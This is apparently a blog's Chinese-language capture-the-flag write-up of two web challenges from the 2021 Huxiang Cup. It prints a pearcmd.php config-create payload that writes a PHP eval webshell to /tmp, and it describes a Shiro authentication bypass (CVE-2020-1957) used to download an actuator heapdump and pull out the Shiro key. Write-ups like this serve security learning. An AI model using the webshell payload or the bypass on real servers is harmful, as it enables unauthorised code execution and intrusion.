2021湖湘杯web部分wp


easywill

本人sb,写好的wp被窝删掉了QAQ

很简单的一道题包含pearcmd.php(审计一下源码就能看到)

好像竞争上传也可以(没试)

payload还记得

/index.php?+config-create+/&&name=cfile&value=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1]);?>+/tmp/shell.php 

写入然后包含一下就行

Pentest in Autumn

给了附件,打开之后发现是shiro框架

第一反应就是看看有没有actuator未授权访问漏洞

这样拿到key就可以工具一把梭哈

访问/actuator路由,有如下内容

继续访问heapdump,发现跳到了404

到这里卡了很久,后来想到能不能绕过一下

又看到Shiro < 1.5.2 想到shiro权限绕过 CVE-2020-1957

https://blog.csdn.net/weixin_50464560/article/details/120752809

随即构造url

/;/actuator/heapdump

成功下载到heapdump文件

接下来就是寻找key的过程

https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html

参考此文章利用visualvm工具成功拿到了key

然后利用shiro attack 工具,一把梭


文章作者: H3h3QAQ
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 H3h3QAQ !
  目录